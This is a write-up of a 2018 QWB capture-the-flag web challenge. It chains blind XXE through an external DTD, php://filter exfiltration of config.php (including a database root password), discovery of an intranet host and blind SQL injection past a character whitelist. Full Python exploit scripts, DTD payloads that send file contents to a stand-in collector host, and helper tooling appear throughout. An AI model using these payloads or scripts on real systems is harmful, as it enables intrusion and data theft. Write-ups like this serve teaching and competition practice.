
強網杯 (QWB CTF): 教育機構的培訓平台 (Training Platform of an Educational Institution)

安恆網路空間安全講武堂


This challenge apparently had zero solves during the competition; I only got it after the event, while the instance was still up, after stepping into one pit after another...

The domain we were given had no ICP filing when opened, so I used the IP instead and followed the usual pentest routine: whois showed privacy protection enabled, and an nmap scan found ports 22 and 33899 open besides 80. Brute-forcing port 22 was hardly the intended path, so I went to port 33899. At first glance it looked identical to port 80, but the mail page differed. After browsing for a while it was clear the site had few input points: just one send-mail function.

Testing showed that the send-mail function on port 80 did nothing useful, so I focused on port 33899. XSS and SQL injection went nowhere; then I threw an XXE probe at it on a whim and got back an XML parse error.

So it was clearly a blind XXE. But however I tested, no callback arrived, and I guessed that, as in the earlier 08067 CTF challenge, entity references were being filtered, so I moved the entity definitions into an external DTD. That did it: the request arrived. Payload:

xml (sent in the comment field; only the tail of the internal subset survived on this page):

%dtd;]>

dtd (evil.dtd, hosted on the collector; only the tail survived on this page):

">
%all;
%send;

Next I tried reading source code through the php:// wrapper and found nothing of value, so I changed the DTD to read config.php:

<?php
//error_reporting(E_ALL^E_NOTICE^E_WARNING);
error_reporting(E_ERROR | E_WARNING | E_PARSE);
define(BASEDIR, "/var/www/52dandan.club/");
define(FLAG_SIG, 1);
define(SECRETFILE,"/var/www/52dandan.com/public_html/youwillneverknowthisfile_e2cd3614b63ccdcbfe7c8f07376fe431");
//global $error_msg;
$DBHOST = "127.0.0.1";
$DBUSER = "root";
$DBPASS = "QWB2018qwb@)!*";
//$DBPASS = "";
$DBNAME = "QWB1234";
$mysqli = @new mysqli($DBHOST, $DBUSER, $DBPASS, $DBNAME,3306);
if(mysqli_connect_errno()){
    echo "no sql connection!!!".mysqli_connect_error();
    $mysqli=null;
    die();
}
?>

Which gives the first part of the flag:

5bdd3b0ba1fcb40

After looking around without finding the second part, I moved on to the intranet. The hint (arp -a) pointed at the ARP table, so I tried reading /proc/net/arp, which errored.

But the error was not "file does not exist", so I guessed either a permissions problem or a file too large to be returned. A search turned up a method that compresses the data with zlib:

php://filter/read=zlib.deflate/convert.base64-encode/resource=/proc/net/arp

That worked and the data came back; a short script restores it:

<?php
// flag.txt holds the query string as logged on the collector. The base64 was URL-decoded on
// the way into the log, which turned every '+' into a space, so put them back first.
$str = file_get_contents("./flag.txt");
$str = str_replace(" ","+",$str);
function decode($str){
    $str = base64_decode($str);
    $str = gzinflate($str);   // raw deflate: the inverse of the zlib.deflate filter
    return $str;
}
print_r(decode($str));
?>
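As an added example (written for this page, not the author's code), the pieces of the out-of-band channel described above in Python 3: the XML for the comment field and the evil.dtd it pulls in, with the declaration lines that did not survive on this page restored and attacker.example standing in for the collector host, which the page never names; a small collector that serves the DTD from memory and records each callback's query string; and the decoder that undoes the zlib.deflate/base64 filter chain, putting back the '+' characters that URL decoding turns into spaces, the same fix the PHP script above applies. The root element name and the leaked file content used by demo() are constructed. On the nesting itself: the inner '%' is written as &#x25; so it survives the outer literal, and the nested declaration has to live in an external DTD because the XML specification forbids parameter-entity references inside markup declarations in the internal subset.

```python
import base64
import threading
import urllib.parse
import urllib.request
import zlib
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# Placeholder for the host that serves evil.dtd and receives the callbacks; the page never names it.
COLLECTOR = "http://attacker.example"
SAMPLE_LEAK = b"<?php $DBNAME = 'example'; ?>\n"   # constructed file content for the demo


def build_xml(dtd_url):
    """Body for the comment field: the internal subset only pulls in the external DTD.
    The root element name is an assumption."""
    return ('<!DOCTYPE root [\n'
            f'<!ENTITY % dtd SYSTEM "{dtd_url}">\n'
            '%dtd;]>\n'
            '<root/>')


def build_dtd(resource, collector):
    """evil.dtd: %file; reads the resource, %all; declares %send;, whose SYSTEM id carries the
    data out. The inner '%' is written as &#x25; so it survives the outer literal, and the
    nesting must live in an external DTD: XML forbids parameter-entity references inside
    markup declarations in the internal subset."""
    return (f"<!ENTITY % file SYSTEM '{resource}'>\n"
            f"<!ENTITY % all \"<!ENTITY &#x25; send SYSTEM '{collector}/?%file;'>\">\n"
            "%all;\n"
            "%send;\n")


def encode_like_php_filter(data):
    """What php://filter/read=zlib.deflate/convert.base64-encode emits: raw deflate, then base64."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    return base64.b64encode(comp.compress(data) + comp.flush()).decode()


def decode_leak(query):
    """Inverse of the filter chain for one callback's query string. A log that was URL-decoded
    has turned every '+' of the base64 into a space; put them back before decoding."""
    query = urllib.parse.unquote(query).replace(" ", "+")
    return zlib.decompress(base64.b64decode(query), -15)   # -15: raw deflate, no zlib header


class Collector(BaseHTTPRequestHandler):
    """Serves the current DTD at /evil.dtd and records the query string of every other request.
    Holding the DTD in memory lets each probe change it without rewriting a file on disk."""
    dtd_text = ""
    hits = []

    def do_GET(self):
        url = urllib.parse.urlsplit(self.path)
        if url.path == "/evil.dtd":
            body = self.dtd_text.encode()
            self.send_response(200)
            self.send_header("Content-Type", "application/xml-dtd")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)
        else:
            Collector.hits.append(url.query)       # raw query string, '+' intact
            self.send_response(204)
            self.end_headers()

    def log_message(self, *args):
        pass


def start_collector():
    srv = ThreadingHTTPServer(("127.0.0.1", 0), Collector)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def demo():
    """Play both sides on localhost: the 'target' fetches the DTD, then calls back with
    SAMPLE_LEAK pushed through the same filter chain. Returns the served DTD and the decoded leak."""
    srv = start_collector()
    base = f"http://127.0.0.1:{srv.server_address[1]}"
    Collector.dtd_text = build_dtd(
        "php://filter/read=zlib.deflate/convert.base64-encode/resource=config.php", base)
    try:
        served = urllib.request.urlopen(base + "/evil.dtd").read().decode()
        urllib.request.urlopen(base + "/?" + encode_like_php_filter(SAMPLE_LEAK))
    finally:
        srv.shutdown()
        srv.server_close()
    return served, decode_leak(Collector.hits[-1])


if __name__ == "__main__":
    print(build_xml(COLLECTOR + "/evil.dtd"))
    served, leak = demo()
    print(served)
    print(leak.decode())
```

Serving the DTD from memory is also what removes the race the page mentions between rewriting evil.dtd on disk and sending the next request: each probe sets Collector.dtd_text before it posts.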

And then it spat out a pile of IPs...

IP address       HW type     Flags       HW address            Mask     Device
192.168.223.127  0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.223.144  0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.223.17   0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.223.143  0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.223.125  0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.223.158  0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.223.161  0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.223.141  0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.223.156  0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.223.139  0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.223.154  0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.223.134  0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.223.137  0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.223.152  0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.223.132  0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.223.151  0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.223.130  0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.223.149  0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.223.18   0x1         0x2         02:42:c0:a8:df:12     *        eth0
192.168.223.128  0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.223.126  0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.223.147  0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.223.1    0x1         0x2         02:42:91:f9:c9:d4     *        eth0
192.168.223.142  0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.223.145  0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.223.160  0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.223.140  0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.223.159  0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.223.138  0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.223.157  0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.223.136  0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.223.155  0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.223.135  0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.223.150  0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.223.153  0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.223.133  0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.223.148  0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.223.131  0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.223.146  0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.223.129  0x1         0x0         00:00:00:00:00:00     *        eth0

Visiting one at random returned "no such host", so I guessed that a pile of junk entries had been written in statically and one of them was the real intranet address. So I wrote a script (a word on the approach: because this is an intranet environment the script is not that easy to write; the idea is to run it on the collector server, rewriting the DTD file while sending the requests), which found that

192.168.223.18 is the real intranet address.

import requests

url = "http://39.107.33.75:33899/common.php"
s = requests.Session()

# Placeholder for the host that serves evil.dtd and receives the callbacks (not given on the page).
COLLECTOR = "http://attacker.example"

# XML posted in the comment field. The entity declaration was lost when this page was scraped
# and is restored here; the root element name is an assumption.
data = {"name": "pupiles", "email": "ssadasdasd@gmail.com",
        "comment": """<!DOCTYPE root [
<!ENTITY % dtd SYSTEM "{c}/evil.dtd">
%dtd;]>
<root/>""".format(c=COLLECTOR)}

with open("ip.txt", "r") as f:
    ip = f.read().split("\n")

for i in range(40):
    # Rewrite the DTD the target fetches so that %file; reads the candidate host's front page.
    # The two declaration lines were lost when this page was scraped and are restored here.
    payload2 = """<!ENTITY % file SYSTEM 'php://filter/read=zlib.deflate/convert.base64-encode/resource=http://{}/'>
<!ENTITY % all "<!ENTITY &#x25; send SYSTEM '{c}/?%file;'>">
%all;
%send;""".format(ip[i], c=COLLECTOR)
    with open("./evil.dtd", "w") as f:
        f.write(payload2)
    print(payload2)
    r = s.post(url, data=data)
    #print(r.text)
    # The target reflects PHP's warning for an unreachable host ("No route to host in ...").
    if "No route to host in" not in r.text:
        print(ip[i])
        break
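The ARP table above already singles out the real host without the 40-request scan, as an added check (example code written for this page, not from the original writeup). In /proc/net/arp the Flags column is 0x2 (ATF_COM, a completed entry) only for neighbours that actually answered, and the page's table has exactly two such entries, 192.168.223.18 and 192.168.223.1; the other 38 carry 0x0 and an all-zero MAC. The 02:42 prefix is the one Docker gives its bridge interfaces, and Docker's bridge driver derives the rest of a container's MAC from its IPv4 address, which is why 02:42:c0:a8:df:12 reads back as 192.168.223.18 while the gateway's 02:42:91:f9:c9:d4 does not encode 192.168.223.1. SAMPLE_ARP is an excerpt of the table on the page.

```python
ATF_COM = 0x02   # ARP flag: entry completed (Linux if_arp.h); 0x0 entries never resolved

# Excerpt of the /proc/net/arp dump shown on the page.
SAMPLE_ARP = """IP address       HW type     Flags       HW address            Mask     Device
192.168.223.127  0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.223.144  0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.223.18   0x1         0x2         02:42:c0:a8:df:12     *        eth0
192.168.223.128  0x1         0x0         00:00:00:00:00:00     *        eth0
192.168.223.1    0x1         0x2         02:42:91:f9:c9:d4     *        eth0
192.168.223.129  0x1         0x0         00:00:00:00:00:00     *        eth0
"""


def parse_arp(text):
    """Parse /proc/net/arp output (one header line, then one entry per line)."""
    entries = []
    for line in text.splitlines()[1:]:
        parts = line.split()
        if len(parts) < 6:
            continue
        ip, hw_type, flags, mac, mask, dev = parts[:6]
        entries.append({"ip": ip, "flags": int(flags, 16), "mac": mac.lower(), "dev": dev})
    return entries


def resolved_hosts(entries):
    """Entries the kernel actually resolved: ATF_COM set and a real MAC address."""
    return [e["ip"] for e in entries
            if e["flags"] & ATF_COM and e["mac"] != "00:00:00:00:00:00"]


def docker_mac_to_ip(mac):
    """Docker's bridge driver builds container MACs as 02:42 followed by the container's IPv4
    address. Return that address, or None if the MAC lacks the 02:42 prefix."""
    octets = mac.lower().split(":")
    if len(octets) != 6 or octets[:2] != ["02", "42"]:
        return None
    return ".".join(str(int(o, 16)) for o in octets[2:])


def docker_containers(entries):
    """Resolved entries whose MAC encodes their own IP: containers on this Docker bridge.
    The gateway also carries a 02:42 MAC, but a random one, so it is left out."""
    return [e["ip"] for e in entries
            if e["flags"] & ATF_COM and docker_mac_to_ip(e["mac"]) == e["ip"]]


if __name__ == "__main__":
    arp = parse_arp(SAMPLE_ARP)
    print("resolved:", resolved_hosts(arp))
    print("containers:", docker_containers(arp))
```

Run against the full table from the page, resolved_hosts returns the same two addresses and docker_containers narrows them to 192.168.223.18, the host the scan found.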

Then it turned out this host's home page was also too large to be returned directly, yet another pit. Logically, reading from an intranet host should not go through the php:// wrapper at all, but after trying every other method with no result I went back to the original one:

php://filter/read=zlib.deflate/convert.base64-encode/resource=http://192.168.223.18/

and it actually worked, because the intranet service had URL wrappers (allow_url_fopen) enabled. But index.html contained no flag, so I brute-forced paths and found test.php; reading it returned the following:

I Love DanDanOnline Shop System Testing!!!Our online sales system is coming soon.Now open the test interface to internal employees!!!This time is the last testing before online!!!So this time,we test the query and search interface at once !!!!start testing~~~~your goods"s name is "",your goods"s price is "",your goods"s quantity is "",your goods"s total is "",testing finish~~~~

When I first saw this I must have been brain-dead to think it was steganography; it is obviously asking for a parameter. So I brute-forced parameter names: id, name, price, quantity, total, no luck. Then I reread the text carefully: the parameter should cover the goods' name, price and total, so I guessed either good or shop, and it turned out to be shop. Next came injection, and that is where the real pit began: blind SQL injection through the intranet is painful to test, and a pile of characters was filtered. I ground away at it for a long time and could not get it (I found that many other players were stuck here too). In the end I had no choice but to ask the challenge author, who gave me the whitelist:

$whitelist = "?`"0123456789abcdefghijklmnopqrstuvwxyz{}()_.+-""

Filtered are `,`, `=` and other key characters, but luckily no keywords. After some fuzzing I found a usable payload:

php://filter/read=zlib.deflate/convert.base64-encode/resource=http://192.168.223.18/test.php?shop=3"-(case%a0when((select%a0database())like%a0binary("________"))then(0)else(1)end)-"1

The rest is a blind-injection script; the second part of the flag is in the total column.

Script:

import requests

url = "http://39.107.33.75:33899/common.php"
s = requests.Session()
result = ""

# Placeholder for the host that serves evil.dtd and receives the callbacks (not given on the page).
COLLECTOR = "http://attacker.example"

# XML posted in the comment field. The entity declaration was lost when this page was scraped
# and is restored here; the root element name is an assumption.
data = {"name": "pupiles", "email": "ssadasdasd@gmail.com",
        "comment": """<!DOCTYPE root [
<!ENTITY % dtd SYSTEM "{c}/evil.dtd">
%dtd;]>
<root/>""".format(c=COLLECTOR)}

# Expressions substituted for select%a0database() later on, to get the table and column names:
#p1 = "database()"
#p2 = 'select%a0group_concat(table_name)%a0from%a0information_schema.tables%a0where%a0table_schema%a0like%a0"qwbinner"'
#p3 = 'select%a0group_concat(column_name)%a0from%a0information_schema.columns%a0where%a0table_name%a0like%a0"albert_shop"'

for i in range(0, 28):
    for j in range(48, 123):
        # Pattern: the guessed character at position i, '_' (any single character) elsewhere.
        # The two declaration lines were lost when this page was scraped and are restored here.
        payload2 = """<!ENTITY % file SYSTEM 'php://filter/read=zlib.deflate/convert.base64-encode/resource=http://192.168.223.18/test.php?shop=3"-(case%a0when((select%a0database())like%a0binary("{}"))then(0)else(1)end)-"1'>
<!ENTITY % all "<!ENTITY &#x25; send SYSTEM '{c}/?%file;'>">
%all;
%send;""".format("_" * i + chr(j) + "_" * (27 - i), c=COLLECTOR)
        with open("./evil.dtd", "w") as f:
            f.write(payload2)
        print("test {}".format(chr(j)))
        r = s.post(url, data=data)
        #print(r.text)
        # The marker is a fragment of the deflate+base64 page seen when the condition is true;
        # '_' is skipped because, as a LIKE wildcard, it matches every position.
        if "Oti3a3LeLPdkPkqKF84xs=" in r.text and chr(j) != "_":
            result += chr(j)
            print(chr(j))
            break

print(result)

Note that with this payload you first have to determine the length:

# Length probe, reusing url, s and data from the script above: a pattern of i underscores
# matches only a value of exactly i characters.
COLLECTOR = "http://attacker.example"   # placeholder collector host, as above
for i in range(1, 30):
    payload2 = """<!ENTITY % file SYSTEM 'php://filter/read=zlib.deflate/convert.base64-encode/resource=http://192.168.223.18/test.php?shop=3"-(case%a0when((select%a0database())like%a0binary("{}"))then(0)else(1)end)-"1'>
<!ENTITY % all "<!ENTITY &#x25; send SYSTEM '{c}/?%file;'>">
%all;
%send;""".format("_" * i, c=COLLECTOR)
    with open("./evil.dtd", "w") as f:
        f.write(payload2)
    r = s.post(url, data=data)
    if "Oti3a3LeLPdkPkqKF84xs=" in r.text:
        print("length:", i)
        break
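As an added example (not from the original writeup), the payload construction and the extraction loop of the scripts above in one place, Python 3. build_condition reproduces the page's payload exactly (the separator is the NBSP byte 0xA0, sent as %a0), outside_whitelist checks a probe against the whitelist the author was given, and find_length/extract run the length probe and the character-by-character LIKE BINARY search. The transport is abstracted into an oracle: make_oracle is a constructed stand-in that answers from a known secret (qwbinner, the database name in the page's comments), so the block runs offline; against the real target the oracle is what the scripts above do, write evil.dtd, POST to common.php and look for the marker in the response. Why the arithmetic form needs no '=': MySQL casts the quoted strings to numbers, so shop evaluates to 3-0-1 = 2 when the condition holds and to 3-1-1 = 1 otherwise, two different rows and therefore two different pages.

```python
import re

# Whitelist as given by the challenge author on this page.
WHITELIST = set('?`"0123456789abcdefghijklmnopqrstuvwxyz{}()_.+-')
SEP = "\xa0"        # MySQL's parser accepts 0xA0 as whitespace; it goes over the wire as %a0
TARGET = "http://192.168.223.18/test.php"
FILTER = "php://filter/read=zlib.deflate/convert.base64-encode/resource="


def build_condition(expr, pattern):
    """shop=3"-(case when (<expr>) like binary("<pattern>") then 0 else 1 end)-"1
    MySQL casts "3" and "1" to numbers, so the parameter is 2 when the pattern matches and
    1 otherwise: two different shop rows, hence two different pages, with no '=' or ','."""
    return (f'3"-(case{SEP}when(({expr})like{SEP}binary("{pattern}"))'
            f'then(0)else(1)end)-"1')


def resource_url(condition):
    """The URL the DTD's %file; entity points at; only the NBSP needs percent-encoding."""
    return FILTER + TARGET + "?shop=" + condition.replace(SEP, "%a0")


def outside_whitelist(condition):
    """Characters of the decoded parameter that the whitelist would reject."""
    return {c for c in condition if c not in WHITELIST}


def find_length(oracle, expr, max_len=30):
    """A pattern of n underscores matches only a value of exactly n characters."""
    for n in range(1, max_len + 1):
        if oracle(build_condition(expr, "_" * n)):
            return n
    return None


# Characters worth probing: whitelisted, minus '_' (a LIKE wildcard, matches everything) and
# '"' (would close the pattern literal). LIKE BINARY is case-sensitive and uppercase is not
# whitelisted, so an uppercase value cannot be recovered this way.
ALPHABET = sorted(WHITELIST - set('_"'))


def extract(oracle, expr, length):
    """Recover a value of known length one position at a time."""
    out = ""
    for i in range(length):
        for ch in ALPHABET:
            if oracle(build_condition(expr, "_" * i + ch + "_" * (length - i - 1))):
                out += ch
                break
        else:
            out += "?"   # nothing matched: a character outside ALPHABET, e.g. a literal '_'
    return out


def make_oracle(secret):
    """Constructed stand-in for the target: answers whether the probe's LIKE BINARY pattern
    matches `secret` (case-sensitive, '_' = any single character). Against the real target
    the oracle writes evil.dtd, POSTs to common.php and looks for the marker in the response."""
    def oracle(condition):
        pattern = re.search(r'binary\("([^"]*)"\)', condition).group(1)
        return len(pattern) == len(secret) and all(
            p == "_" or p == s for p, s in zip(pattern, secret))
    return oracle


if __name__ == "__main__":
    db = f"select{SEP}database()"
    print(resource_url(build_condition(db, "_" * 8)))
    oracle = make_oracle("qwbinner")        # constructed secret: the database name on the page
    n = find_length(oracle, db)
    print(n, extract(oracle, db, n))
```

A literal '_' in the target value shows up as '?' in the result rather than silently shifting the following characters, which is what happens when a loop simply skips the position.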

Putting it all together, the flag is:

QWB

